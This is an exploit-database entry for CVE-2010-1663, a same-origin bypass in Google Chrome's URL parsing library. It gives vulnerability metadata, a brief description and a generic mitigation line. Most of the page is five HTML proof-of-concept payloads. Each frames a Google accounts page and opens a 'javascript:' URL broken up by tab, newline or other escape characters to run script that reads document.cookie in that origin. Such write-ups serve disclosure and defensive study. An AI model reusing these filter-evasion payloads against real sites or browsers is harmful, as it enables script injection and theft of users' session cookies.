header-logo
Suggest Exploit
vendor:
Chrome
by:
Jordi Chancel
7,5
CVSS
HIGH
Cross Origin Bypass
20
CWE
Product Name: Chrome
Affected Version From: 4.1.249.1059
Affected Version To: 4.1.249.1064
Patch Exists: YES
Related CWE: CVE-2010-1663
CPE: a:google:chrome
Metasploit: https://www.rapid7.com/db/vulnerabilities/google-chrome-cve-2010-1663/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2010

Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)

The Google URL Parsing Library (aka google-url or GURL) in Google Chrome before 4.1.249.1064 allows remote attackers to bypass the Same Origin Policy via CHARACTER TABULATION or others escape characters inside javascript: protocol string.

Mitigation:

Ensure that the application is not vulnerable to Cross-Origin Bypass attacks by validating the origin of the request.
Source

Exploit-DB raw data:

#	Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)
#
#	CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1663
#
#	Author: Jordi Chancel
#
#	Software Link: http://googlechromereleases.blogspot.com/2010/04/stable-update-bug-and-security-fixes.html
#
#	Description: {
#		The Google URL Parsing Library (aka google-url or GURL) in Google Chrome 
#		before 4.1.249.1064 allows remote attackers to bypass the Same Origin Policy 
#		via CHARACTER TABULATION or others escape characters inside javascript: protocol string. }
#
#	Some PoC : 

<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> 
<a href="#" value="test" onclick="window.open('javascr\u0009ipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> 
<a href="#" value="test" onclick="window.open('javascr\x09ipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> 
<a href="#" value="test" onclick="window.open('javascr\nipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> 
<a href="#" value="test" onclick="window.open('javascr\ript:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> 
<a href="#" value="test" onclick="window.open('javascr\tipt:alert(document.cookie)','test')" >Inject JavaScript</a>

Greetz : Xylitol , Eddy Bordi , 599eme Man , Gnouf , CTZ .

Navigation

Suggest Exploit

Services By CQR